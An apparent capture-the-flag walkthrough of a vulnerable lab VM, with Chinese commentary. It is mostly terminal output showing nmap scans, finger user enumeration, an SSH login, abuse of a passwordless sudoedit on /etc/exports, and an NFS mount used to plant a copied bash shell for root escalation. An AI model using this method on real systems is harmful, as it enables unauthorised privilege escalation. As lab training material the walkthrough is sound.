root@kali:~# nmap -sn -v 192.168.66.* Nmap scan report for 192.168.66.18 Host is up (0.00018s latency). MAC Address: 00:0C:29:6C:D6:66 (VMware)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
root@kali:~# nmap -sV -v -p- 192.168.66.18 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd 79/tcp open finger Linux fingerd 110/tcp open pop3? 111/tcp open rpcbind 2-4 (RPC #100000) 143/tcp open imap Dovecot imapd 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 993/tcp open ssl/imaps? 995/tcp open ssl/pop3s? 2049/tcp open nfs_acl 2-3 (RPC #100227) 39832/tcp open mountd 1-3 (RPC #100005) 42471/tcp open status 1 (RPC #100024) 45506/tcp open nlockmgr 1-4 (RPC #100021) 52840/tcp open mountd 1-3 (RPC #100005) 53613/tcp open mountd 1-3 (RPC #100005)
root@kali:~# finger @192.168.66.18 No one logged on. root@kali:~# finger root@192.168.66.18 Login: root Name: root Directory: /root Shell: /bin/bash Never logged in. No mail. No Plan. root@kali:~# finger user@192.168.66.18 Login: user Name: user Directory: /home/user Shell: /bin/bash Never logged in. No mail. No Plan.
Login: dovenull Name: Dovecot login user Directory: /nonexistent Shell: /bin/false Never logged in. No mail. No Plan. root@kali:~# finger vulnix@192.168.66.18 Login: vulnix Name: Directory: /home/vulnix Shell: /bin/bash Never logged in. No mail. No Plan.
root@kali:~# ssh user@192.168.66.18 The authenticity of host '192.168.66.18 (192.168.66.18)' can't be established. ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.66.18' (ECDSA) to the list of known hosts. Enter passphrase for key '/root/.ssh/id_rsa': user@192.168.66.18's password: Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Thu Apr 16 03:53:37 BST 2020
System load: 0.0 Processes: 89 Usage of /: 90.2% of 773MB Users logged in: 0 Memory usage: 7% IP address for eth0: 192.168.66.18 Swap usage: 0%
=> / is using 90.2% of 773MB Graph this data and manage this system at https://landscape.canonical.com/
user@vulnix:~$ id uid=1000(user) gid=1000(user) groups=1000(user),100(users) user@vulnix:~$ whoami user user@vulnix:~$ pwd /home/user user@vulnix:~$ uname -a Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
System information as of Thu Apr 16 04:23:19 BST 2020
System load: 0.0 Processes: 92 Usage of /: 90.2% of 773MB Users logged in: 1 Memory usage: 9% IP address for eth0: 192.168.66.18 Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.6 LTS' available. Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
vulnix@vulnix:~$ sudo -l Matching 'Defaults' entries for vulnix on this host: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host: (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
很好,vulnix可以运行命令来打开/etc/exports,不用输入密码。这是发现的:
1 2 3 4 5 6 7 8 9 10 11 12
vulnix@vulnix:~$ sudoedit /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /home/vulnix *(rw,root_squash)
root@kali:~# ping -c 4 192.168.66.18 PING 192.168.66.18 (192.168.66.18) 56(84) bytes of data. 64 bytes from 192.168.66.18: icmp_seq=1 ttl=64 time=1.04 ms 64 bytes from 192.168.66.18: icmp_seq=2 ttl=64 time=0.279 ms 64 bytes from 192.168.66.18: icmp_seq=3 ttl=64 time=0.482 ms 64 bytes from 192.168.66.18: icmp_seq=4 ttl=64 time=0.492 ms
--- 192.168.66.18 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3033ms rtt min/avg/max/mdev = 0.279/0.572/1.037/0.281 ms
然后再次挂载分区:
1 2 3 4
root@kali:~# mount 192.168.66.18:/home/vulnix /mnt/vulnix root@kali:~# cd /mnt/vulnix root@kali:/mnt/vulnix# ls local_shell
挂载后,获得了受害者计算机本地shell的副本,并将所有权和SID更改为root:
在受害者的机器上,如“vulnix”:
1 2 3
vulnix@vulnix:~$ cp /bin/bash local_shell vulnix@vulnix:~$ ls local_shell